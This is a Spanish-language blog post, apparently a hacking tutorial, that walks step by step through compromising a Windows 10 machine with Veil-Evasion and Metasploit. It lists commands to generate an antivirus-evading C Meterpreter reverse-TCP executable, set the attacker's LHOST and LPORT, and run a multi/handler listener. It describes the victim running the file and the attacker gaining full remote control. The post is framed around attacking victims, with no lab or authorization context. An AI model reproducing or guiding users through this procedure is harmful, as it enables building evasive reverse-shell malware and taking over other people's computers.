HACKEAR WINDOWS 10 CON VEIL EVASION Y METASPLOIT KALI LINUX 2.0

HACKEAR WINDOWS 10 CON VEIL EVASION Y METASPLOIT


En la actualidad los sistemas operativos se han actualizado y han tendido demasiado auge entre los usuarios, Windows ha actualizado su sistema operativo y con ello los millones de usuarios que ya lo están usando, ha tenido pros y contras.

Sabiendo que no todos los sistemas son seguros, Windows no es la excepción, bueno como lo dice el título acá te enseñare cómo hacerlo paso a paso, así que comencemos.

Lo primero que tenemos que haces es irnos a la terminal y colocar lo siguiente tenemos que tener instaladoVeil-Evasion buscamos la ruta donde lo tenemos instaldo en mi caso seria cd /usr/share/veil-evasionluego lo ejecutamos con este código  ./Veil-Evasion.py


nos llevara a esta pantalla 


luego con el comando use escogemos el payload a usar nos arrojara un listado de payloads disponibles en  este caso escogeré el 5 c/meterpreter/rev_tcp  


nos queda de esta forma 


configuramos nuestro LHOST Y LPORT seria de la siguiente forma  set LHOST  y tu ip y set LPORT y el puerto que quedara en escucha


luego con el comando generate  crearemos el payload nos pedirá que le coloquemos un nombre al payload en mi caso le colocare aplicación esperamos u momento y nos dará la ruta donde se encuentra  seria/var/lib/veil-evasion/output/compiled  y allí estará el .exe


quedara así 


luego ejecutamos metasploit configuraremos los siguiente
use multi/handler
usaremos este payload
set payload Windows/meterpreter/reverse_tcp
configuramos la ip y el Puerto de la siguiente forma
set Lhost y la ip que pusimos anteriormente
set Lport y el puerto que pusimos anteriormente
y de ultimo exploit
nos quedara todo de la siguiente forma


al momento que la victima ejecute el archivo, tendremos una sesión de meterpreter abierta 


obtendremos acceso total a la maquina





espero que te sea útil y te allá gustado. 



"EL MEJOR SISTEMA OPERATIVO EL CEREBRO "

Comentarios

Entradas populares de este blog

El Modelado de Amenazas de Seguridad

¿Como atacar Kerberos?

Trámites a Distancia: Serie de vulnerabilidades permiten el acceso a datos personales de terceros